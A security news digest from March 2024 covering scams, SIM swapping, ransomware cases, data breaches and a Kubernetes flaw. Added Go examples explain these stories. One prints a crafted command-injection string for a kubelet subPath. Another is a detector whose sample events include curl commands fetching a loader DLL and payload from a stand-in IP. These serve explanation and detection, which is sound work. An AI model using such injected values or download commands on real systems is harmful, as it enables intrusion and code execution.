Daily Brief

2024-03-14 20:26:50 theregister CYBERCRIME FTC Exposes Antivirus Scam, Secures $26 Million Settlement
Restoro and Reimage, two Cyprus-based tech support businesses, have agreed to pay $26 million to settle FTC allegations that they ran a Windows antivirus scam. The FTC says the firms used scare tactics to pressure consumers into paying for unnecessary cleanup software and services. Undercover FTC staff bought the services and found that the companies falsely claimed their PCs needed extensive additional repairs. The scheme particularly targeted older people, luring them with free performance checks that reported fabricated problems and then charging high fees for remote repair sessions. The FTC charged the companies with deceptive representations under the FTC Act and deceptive telemarketing under the Telemarketing Sales Rule. Restoro and Reimage have not admitted wrongdoing, but an FAQ posted on their websites, which were unreachable at the time of writing, says they have stopped new sales and renewals.
2024-03-14 18:55:02 bleepingcomputer CYBERCRIME SIM Swappers Exploit eSIM Technology to Hijack Phone Numbers
SIM swappers are now targeting eSIMs to port victims' phone numbers to devices under their control. eSIMs (Embedded Subscriber Identity Modules) are digital, can be reprogrammed remotely, and are becoming prevalent in modern smartphones and wearables. Cybersecurity firm F.A.C.C.T. observed over a hundred attempts at one financial organization to gain access to personal accounts through eSIM hijacking. Attackers gain control of a user's service provider account, generate a QR code for a new eSIM, and scan it to transfer the victim's phone number to their device. Once attackers hijack the phone number, they can receive access codes and two-factor authentication tokens, allowing them to access bank accounts and other secure services. Cybercriminals also exploit the hijacked number for scams in messenger apps by impersonating the victim. Traditional SIM swapping involved social engineering or insider assistance but is now shifting towards exploiting newer technologies like eSIMs. Experts recommend strong, unique passwords and two-factor authentication for service provider accounts, and suggest using physical keys or authenticator apps for critical accounts.
2024-03-14 18:29:14 theregister CYBERCRIME LockBit Ransomware Administrator Sentenced to Four Years
Mikhail Vasiliev, a Canadian-Russian dual national and key figure within the LockBit ransomware group, has been sentenced to nearly four years in prison by a Canadian court. Vasiliev has been ordered to pay restitution exceeding CA$860,000 to some victims and faces extradition to the United States for additional charges. He pleaded guilty to cyber-extortion, mischief, and weapons charges related to attacks on Canadian businesses. The LockBit ransomware group has extorted over $120 million since 2020, targeting over 2,000 victims. Despite takedowns of LockBit's infrastructure earlier this year, the group remains active, with new victim listings appearing shortly after the law enforcement actions. Few LockBit members have been apprehended; Vasiliev is one of just three individuals named, with only one other arrested. Law enforcement found evidence at Vasiliev's home linking him to LockBit's operations, including a target list and communications with the group's leader. Vasiliev's transition to cybercrime was purportedly influenced by the isolation during the pandemic, according to his defense lawyer.
2024-03-14 18:13:47 bleepingcomputer CYBERCRIME Cybercriminals Exploit eSIMs to Hijack Phone Numbers and Access Accounts
Hackers have updated their techniques to execute SIM swap attacks using eSIM technology. eSIMs are digital SIM cards embedded in mobile devices, offering the same functionalities as traditional SIMs but with the ability to be reprogrammed remotely. Cybersecurity firm F.A.C.C.T. reports numerous attempts by fraudsters to take over online service accounts, particularly targeting a financial organization. Attackers gain control of a user's service provider account to port the victim's phone number to a device with an eSIM, thereafter gaining access to the victim's calls and messages. Once in possession of the phone number, criminals can intercept access codes and two-factor authentication tokens, compromising bank accounts and other sensitive services. Fraudsters can also access and manipulate the victim's messaging accounts, further spreading scams and requesting money from contacts. Security experts advise using complex passwords, enabling two-factor authentication for provider accounts, and considering additional protective measures like physical security keys for critical accounts like e-banking and crypto wallets.
2024-03-14 18:03:22 theregister CYBERCRIME Google Boosts Chrome's Safe Browsing with Enhanced Privacy
Google has upgraded Chrome's Safe Browsing so that the default Standard protection mode performs real-time checks against Google's server-side list while keeping users' browsing history hidden from Google. Previously, Standard protection relied on a locally stored list that was refreshed only periodically, and real-time checks were available only in the Enhanced Protection mode, which shares more data with Google. The new design sends only hash prefixes of the visited URL, and routes them through an Oblivious HTTP (OHTTP) relay operated by Fastly that strips the user's IP address before forwarding the request to Google's Safe Browsing server. Google therefore sees hash prefixes but not who sent them, and Fastly sees the sender but not the prefixes. The change matters because many unsafe sites appear and disappear within minutes, too quickly for static lists to catch. Separately, Chrome's Password Checkup on iOS will begin warning about weak and reused passwords.
2024-03-14 16:41:45 bleepingcomputer MISCELLANEOUS Restoro and Reimage Settle for $26M Over Deceptive Practices
Tech support companies Restoro and Reimage agree to pay $26 million to settle FTC charges of deceptive marketing and scare tactics. The two firms misled customers with false computer threat alerts to sell unnecessary repair services, exploiting particularly older consumers. The Federal Trade Commission (FTC) found that online ads and pop-ups from these companies fraudulently impersonated Microsoft system warnings. FTC investigations revealed the companies' diagnostics software claimed non-existent issues, prompting unnecessary purchases of repair plans. Despite claims of serious computer issues, telemarketers would then upsell more expensive repair plans after remote access to consumers' computers. The proposed FTC order, awaiting court approval, prohibits the companies from continuing their deceptive marketing and scare tactics. The FTC's recent actions also include banning Avast from selling browsing data and imposing restrictions on other companies for misleading practices.
2024-03-14 16:11:00 theregister DATA BREACH France Travail Suffers Massive Data Breach Impacting 43 Million Citizens
France's unemployment agency, France Travail, has reported a data breach that may affect 43 million people, covering records of anyone registered over the past 20 years. Exposed information includes names, dates of birth, social security numbers, and contact details; passwords and bank details were not exposed. The intrusion took place between February 6 and March 5, and those affected are advised to watch for phishing that reuses the stolen data. The Cybercrime Brigade of the Paris Judicial Police is investigating, and the intrusion is believed to have combined social engineering with technical attack vectors. France Travail is notifying affected individuals and has promised to strengthen its security in response to the growing threat. The breach follows other large French data breaches and DDoS attacks on government departments, and it is now considered the largest in the country's history, eclipsing the Viamedis and Almerys breaches.
2024-03-14 16:00:37 bleepingcomputer CYBERCRIME Google Chrome Enhances Privacy-Focused Phishing Protection
Google is updating Chrome's Safe Browsing to provide real-time phishing and malware protection without compromising user privacy. Rather than relying only on a locally stored list, the updated Standard protection checks URLs against Google's server-side list in real time, catching short-lived malicious sites; Google expects this to block about 25% more phishing attempts. The change is also coming to Chrome on Android. Users who want more proactive defence can enable Enhanced Protection, which leverages AI and performs deeper scans of downloads. Privacy is preserved by sending only URL hash prefixes, and by sending them through Oblivious HTTP (OHTTP) relays operated by Fastly, which hide the client's IP address and mix requests from many users so they cannot be tied to an identity. No single party, Google or Fastly included, can see both the hash prefixes and the originating IP address.
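The two Safe Browsing summaries above describe the privacy design only in outline. The Go program below is an added illustration, not Google's or Chrome's code: it shows the hash-prefix (k-anonymity) check that both summaries refer to. The client derives host-suffix/path-prefix expressions from a URL (a simplified version of the Safe Browsing canonicalisation rules, which are longer in the real API), hashes each with SHA-256, and sends only the first four bytes; the server returns every blocklisted full hash sharing those prefixes, and the client completes the match locally, so the server never sees the URL. The blocklist entry, URLs, and function names are constructed for this example; the OHTTP relay that hides the client's IP address is outside it.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"net/url"
	"strings"
)

// PrefixLen is the number of SHA-256 bytes the client reveals to the server.
const PrefixLen = 4

// Expressions returns a simplified set of lookup expressions for a URL: the
// full host plus its parent domains down to two labels, each combined with
// the full path (with and without query) and every parent directory down to "/".
func Expressions(raw string) ([]string, error) {
	u, err := url.Parse(raw)
	if err != nil || u.Host == "" {
		return nil, fmt.Errorf("unparseable URL: %q", raw)
	}
	labels := strings.Split(strings.ToLower(u.Hostname()), ".")
	var hosts []string
	for i := 0; i < len(labels)-1 && i < 5; i++ {
		hosts = append(hosts, strings.Join(labels[i:], "."))
	}
	path := u.EscapedPath()
	if path == "" {
		path = "/"
	}
	paths := []string{path}
	if u.RawQuery != "" {
		paths = append([]string{path + "?" + u.RawQuery}, paths...)
	}
	for p := path; p != "/"; {
		p = p[:strings.LastIndex(strings.TrimSuffix(p, "/"), "/")+1]
		paths = append(paths, p)
	}
	var out []string
	for _, h := range hosts {
		for _, p := range paths {
			out = append(out, h+p)
		}
	}
	return out, nil
}

// FullHash is the 32-byte digest of one expression; Prefix is what leaves the client.
func FullHash(expr string) [32]byte { return sha256.Sum256([]byte(expr)) }

func Prefix(expr string) string {
	h := FullHash(expr)
	return hex.EncodeToString(h[:PrefixLen])
}

// Server holds the blocklist as full hashes indexed by prefix. It receives
// prefixes only (and, in Chrome, receives them via an OHTTP relay, so it does
// not learn the client's IP either). Seen records what the server observed.
type Server struct {
	byPrefix map[string][][32]byte
	Seen     []string
}

func NewServer(blockedExprs ...string) *Server {
	s := &Server{byPrefix: map[string][][32]byte{}}
	for _, e := range blockedExprs {
		h := FullHash(e)
		p := hex.EncodeToString(h[:PrefixLen])
		s.byPrefix[p] = append(s.byPrefix[p], h)
	}
	return s
}

// Lookup returns every blocklisted full hash sharing one of the prefixes.
func (s *Server) Lookup(prefixes []string) [][32]byte {
	var out [][32]byte
	for _, p := range prefixes {
		s.Seen = append(s.Seen, p)
		out = append(out, s.byPrefix[p]...)
	}
	return out
}

// IsUnsafe is the client side: derive expressions, send prefixes, finish the match locally.
func IsUnsafe(s *Server, raw string) (bool, error) {
	exprs, err := Expressions(raw)
	if err != nil {
		return false, err
	}
	prefixes := make([]string, 0, len(exprs))
	for _, e := range exprs {
		prefixes = append(prefixes, Prefix(e))
	}
	candidates := s.Lookup(prefixes)
	for _, e := range exprs {
		fh := FullHash(e)
		for _, c := range candidates {
			if c == fh {
				return true, nil
			}
		}
	}
	return false, nil
}

func main() {
	srv := NewServer("phish.example.net/login/") // constructed blocklist entry
	bad, _ := IsUnsafe(srv, "https://cdn.phish.example.net/login/index.html?x=1")
	good, _ := IsUnsafe(srv, "https://www.example.org/")
	fmt.Println("listed:", bad, "benign:", good, "server saw only prefixes:", srv.Seen)
}
```

The privacy argument rests on the prefix being short: four bytes map to many real URLs, so the server cannot tell which one the client visited, and the relay removes the network identity. In the real service the server answers with full hashes rather than a verdict for exactly this reason.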
2024-03-14 15:04:22 theregister CYBERCRIME Global Initiative Targets Disruption of Cybercrime Networks
The Cybercrime Atlas initiative has moved into its operational phase in 2024 with aims to map and disrupt global cybercriminal activities. Launched by the World Economic Forum (WEF) in 2023, the project involves public-private collaboration, including major players like Banco Santander, Fortinet, Microsoft, and PayPal. The initiative now counts over 20 law enforcement agencies, security firms, financial institutions, NGOs, and academics among its members. The group aims to target the infrastructure of cybercriminal groups, facilitate arrests, and attribute attacks, thus hindering their operations and profitability. Despite previous takedowns, cybercrime persists, with recent ransomware attacks on America's healthcare system and the British Library emphasizing the urgency of this initiative. The Cybercrime Atlas seeks to create actionable intelligence to challenge cybercriminals and has placed cyber threats on the agenda for CEOs and boards. The WEF is also addressing the cybersecurity skills gap and engaging non-cybersecurity audiences in discussions on combating ransomware and improving organizational cybersecurity resilience.
2024-03-14 14:08:19 theregister DATA BREACH Investigation Into Change Healthcare's Massive Data Theft Underway
The US Department of Health and Human Services is starting an investigation into Change Healthcare after a reported 6 TB data theft by the ALPHV ransomware group. Change Healthcare's recovery from the cyberattack is underway, with critical services including prescription processing and insurance claims slowly coming back online. ALPHV claimed responsibility for the attack and the theft of sensitive data, which may include health information of US military personnel and payment details. The actual contents of the stolen data have not been confirmed by Change Healthcare, and security experts have detected a $22 million Bitcoin transaction possibly linked to the ransomware payment. Multiple class action lawsuits have been filed against Change Healthcare, and there is a move to consolidate these cases to streamline litigation processes. The cybersecurity measures of Change Healthcare are under scrutiny to check compliance with HIPAA data protection and privacy rules, following the breach.
2024-03-14 13:52:50 thehackernews CYBERCRIME LockBit Ransomware Affiliate Sentenced and Ordered to Pay Restitution
A Russian-Canadian national, Mikhail Vasiliev, has been sentenced in Canada to nearly four years in prison for his role in the LockBit ransomware operation. He was arrested in November 2022 after a search of his home turned up evidence of his involvement in cyber extortion. He pleaded guilty to multiple charges, including cyber extortion, and was ordered to pay more than CA$860,000 in restitution to victims. Justice Michelle Fuerst described him as a "cyber terrorist" who was motivated by greed during the pandemic. LockBit's operations were heavily disrupted in February 2024 when law enforcement seized its infrastructure and arrested two affiliates. Separately, a federal jury in Washington, D.C. convicted Roman Sterlingov of laundering money through Bitcoin Fog, a service used to launder the proceeds of computer crime, theft and other offences.
2024-03-14 13:32:19 bleepingcomputer DATA BREACH Massive Data Breach at French Unemployment Agency Affects 43 Million
France Travail, the French unemployment agency, has disclosed a data breach affecting up to 43 million people. Attackers had access to the agency's systems between February 6 and March 5 and retrieved personal data on job seekers registered over the past 20 years. The exposed profile data raises the risk of identity theft and phishing for those affected; bank details and passwords were not compromised, but the stolen data can be combined with that from other breaches. The agency is notifying potentially affected individuals and urges them to be wary of unsolicited communications. France's data protection authority, the Commission Nationale de l'Informatique et des Libertés (CNIL), has been notified of the breach and its extent, and victims can file a complaint with the Paris prosecutor's office to support the investigation. The breach surpasses France's previous largest in both scope and number of people affected.
2024-03-14 13:06:44 bleepingcomputer DATA BREACH Nissan Oceania Data Breach Affects 100,000 Individuals
Nissan Oceania experienced a cyberattack in December 2023, with the Akira ransomware group claiming responsibility. The attack resulted in a significant data breach involving personal information of around 100,000 current and former employees and customers. Compromised data includes government identification such as Medicare cards, driver's licenses, passports, and tax file numbers, as well as loan documents and employment details. Akira has already leaked some of the stolen data on the dark web. Nissan is contacting affected individuals directly to provide details and support, after working to remove duplicates from the contact list. Up to 10% of the impacted individuals had their government IDs exposed; the remainder had other personal data compromised. Nissan is offering free identity protection services, credit monitoring, and reimbursement for replacing compromised government IDs. Customers are advised to be alert for scams that use the stolen data, to enable multi-factor authentication, and to change their passwords.
2024-03-14 12:00:08 thehackernews CYBERCRIME High-Severity Kubernetes Flaw Allows Windows Node Takeover
A high-severity Kubernetes vulnerability that allowed remote code execution with SYSTEM privileges on Windows nodes has been disclosed. Tracked as CVE-2023-5528, it affects kubelet versions from 1.8.0 onward and was patched on November 14, 2023; only clusters with Windows nodes that use in-tree storage plugins are exposed. The flaw is a command-injection bug: when mounting a local volume for a pod, kubelet built a Windows command line from pod-supplied volume parameters without sanitizing them, so an attacker able to create pods could run arbitrary commands as SYSTEM and take over every Windows node in the cluster. The fix replaces the command-line invocation with a native Go function call, so the parameters are passed to the operating system as data rather than reinterpreted by a shell. The disclosure coincides with reports that a critical flaw in Uniview ISC 2500-S cameras is being exploited to spread the NetKiller variant of the Mirai botnet.
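As an added illustration of the bug class the summary describes, not the kubelet's actual code, the Go snippet below contrasts building a Windows command line from an untrusted subPath with creating the link through a native call. The function names, the ErrBadSubPath error and the sample subPath values are assumptions made for this example, and the containment check in resolveSubPath is an extra hardening step beyond the native-call replacement the summary reports. The injected string is only constructed and printed, never executed, so the program is safe to run.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// vulnerableLinkCommand shows the dangerous pattern: a pod-supplied subPath
// is spliced into a single "cmd /c mklink" string. cmd.exe re-parses the
// whole string, so metacharacters inside subPath (", &&, |) become extra
// commands run as the kubelet's user, which is SYSTEM on a Windows node.
// The function only builds and returns the string; nothing is executed.
func vulnerableLinkCommand(volumeRoot, subPath, mountPoint string) string {
	target := volumeRoot + `\` + subPath
	return fmt.Sprintf(`cmd /c mklink /J "%s" "%s"`, mountPoint, target)
}

// ErrBadSubPath is returned for subPaths that are absolute or escape the volume.
var ErrBadSubPath = errors.New("subPath escapes the volume root or is not a plain relative path")

// resolveSubPath confines subPath to volumeRoot: it refuses absolute paths
// and uses filepath.Rel to detect any ".." that climbs out of the root.
func resolveSubPath(volumeRoot, subPath string) (string, error) {
	if subPath == "" || filepath.IsAbs(subPath) {
		return "", ErrBadSubPath
	}
	target := filepath.Join(volumeRoot, subPath)
	rel, err := filepath.Rel(volumeRoot, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrBadSubPath
	}
	return target, nil
}

// safeLink is the hardened counterpart: the link is created with os.Symlink,
// a native call that hands the path to the OS as data, never as a command.
// Shell metacharacters in subPath simply become part of a file name.
func safeLink(volumeRoot, subPath, mountPoint string) error {
	target, err := resolveSubPath(volumeRoot, subPath)
	if err != nil {
		return err
	}
	return os.Symlink(target, mountPoint)
}

func main() {
	// Constructed attacker input: closes the quoted argument and appends a second command.
	inj := `data" && whoami > C:\pwned.txt && rem `
	fmt.Println("command string a shell would run:", vulnerableLinkCommand(`C:\vol`, inj, `C:\pods\x\mnt`))
	_, err := resolveSubPath("/vol", "../etc")
	fmt.Println("traversal rejected:", errors.Is(err, ErrBadSubPath))
}
```

The general lesson, and the reason the maintainers chose a native function rather than escaping the argument, is that quoting rules for cmd.exe are hard to get right; removing the shell from the path removes the injection surface entirely, and the containment check then deals with the separate question of where inside the volume the link may point.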
2024-03-14 10:28:11 thehackernews CYBERCRIME RedCurl Cybercrime Group Utilizes Windows Tool in Espionage Attacks
The Russian-speaking cybercrime group RedCurl has been abusing the legitimate Windows Program Compatibility Assistant (PCA) for corporate espionage. The PCA launcher, pcalua.exe, exists to run older programs with compatibility fixes; the group uses it as a proxy to execute commands and sidestep security controls. Active since 2018, RedCurl has targeted organizations in Australia, Canada, Germany, Russia, the U.K., and the U.S. to steal corporate secrets and employee data. The attack begins with phishing emails carrying malicious .ISO or .IMG attachments, which start a multi-stage chain in which cmd.exe runs the legitimate curl utility to deliver a loader DLL (ms.dll or ps.dll). That DLL abuses pcalua.exe to start a downloader process, which connects to attacker infrastructure to fetch the loader, and the open-source Impacket toolkit is used for further unauthorized command execution. The activity is tied to RedCurl by shared command-and-control infrastructure and downloader artifacts seen in earlier campaigns. Trend Micro's report highlights the group's focus on evading detection by misusing PowerShell, curl, and PCA. Separately, the Russian state-sponsored group Turla has been deploying its Kazuar backdoor through a new wrapper DLL called Pelmeni using DLL side-loading, another example of advanced groups relying on evasive living-off-the-land techniques.
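As an added detection example, not part of Trend Micro's report or RedCurl's tooling, the Go program below applies three process-creation rules to constructed Sysmon-style events: pcalua.exe invoked with its documented -a switch (the proxy-execution pattern), a shell or downloader parented by pcalua.exe, and curl.exe writing a DLL to disk. The event fields, user paths, dl.exe and the 203.0.113.10 address are constructed; ms.dll is taken from the summary.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a minimal process-creation record carrying the fields a
// Sysmon Event ID 1 or Windows Security 4688 entry provides.
type ProcEvent struct {
	ParentImage string
	Image       string
	CommandLine string
}

// baseName lowercases the file name of a Windows or POSIX path.
func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		p = p[i+1:]
	}
	return strings.ToLower(p)
}

// Children that legitimate PCA use (launching a legacy installer) would not spawn.
var suspiciousPCAChildren = map[string]bool{
	"cmd.exe": true, "powershell.exe": true, "pwsh.exe": true, "rundll32.exe": true,
	"regsvr32.exe": true, "mshta.exe": true, "wscript.exe": true, "cscript.exe": true, "curl.exe": true,
}

// Classify returns the names of the rules that match one event.
func Classify(e ProcEvent) []string {
	var hits []string
	img, parent := baseName(e.Image), baseName(e.ParentImage)
	cl := strings.ToLower(e.CommandLine)

	// pcalua.exe's "-a <program>" switch runs an arbitrary program under the
	// compatibility layer; attackers use it as a proxy launcher. Noisy where
	// legacy installers are common, so treat it as a lead, not an alert.
	if img == "pcalua.exe" && strings.Contains(cl, " -a ") {
		hits = append(hits, "pca_proxy_launch")
	}
	// A shell, script host or downloader parented by pcalua.exe is the
	// higher-fidelity signal.
	if parent == "pcalua.exe" && suspiciousPCAChildren[img] {
		hits = append(hits, "pca_suspicious_child")
	}
	// curl.exe saving a DLL matches the loader-delivery step (ms.dll / ps.dll).
	if img == "curl.exe" && (strings.Contains(cl, " -o ") || strings.Contains(cl, "--output")) &&
		strings.Contains(cl, ".dll") {
		hits = append(hits, "curl_dll_drop")
	}
	return hits
}

// Triage runs Classify over a batch and returns the index of every event that fired.
func Triage(events []ProcEvent) map[int][]string {
	out := map[int][]string{}
	for i, e := range events {
		if h := Classify(e); len(h) > 0 {
			out[i] = h
		}
	}
	return out
}

// SampleEvents is a constructed chain following the summary: cmd.exe runs curl to
// fetch the loader DLL, the DLL (hosted by rundll32) launches pcalua.exe, and
// pcalua.exe starts a downloader. Two benign events are included for contrast.
var SampleEvents = []ProcEvent{
	{`C:\Windows\explorer.exe`, `C:\Windows\System32\cmd.exe`, `cmd.exe /c curl.exe -o C:\Users\u\AppData\Local\Temp\ms.dll https://203.0.113.10/ms`},
	{`C:\Windows\System32\cmd.exe`, `C:\Windows\System32\curl.exe`, `curl.exe -o C:\Users\u\AppData\Local\Temp\ms.dll https://203.0.113.10/ms`},
	{`C:\Windows\System32\rundll32.exe`, `C:\Windows\System32\pcalua.exe`, `pcalua.exe -a C:\Windows\System32\curl.exe -o C:\Users\u\AppData\Local\Temp\stage2.bin https://203.0.113.10/s2`},
	{`C:\Windows\System32\pcalua.exe`, `C:\Windows\System32\curl.exe`, `curl.exe -o C:\Users\u\AppData\Local\Temp\stage2.bin https://203.0.113.10/s2`},
	{`C:\Windows\explorer.exe`, `C:\Windows\System32\pcalua.exe`, `pcalua.exe -a D:\oldgame\setup.exe`},
	{`C:\Windows\explorer.exe`, `C:\Windows\System32\notepad.exe`, `notepad.exe notes.txt`},
}

func main() {
	for i, hits := range Triage(SampleEvents) {
		fmt.Printf("event %d: %v\n", i, hits)
	}
}
```

The first rule also fires on the legacy-installer event, which is the expected false positive; correlating it with the parent (rundll32.exe hosting a DLL from a user-writable directory) or with a pca_suspicious_child hit in the same process tree is what turns the lead into an alert.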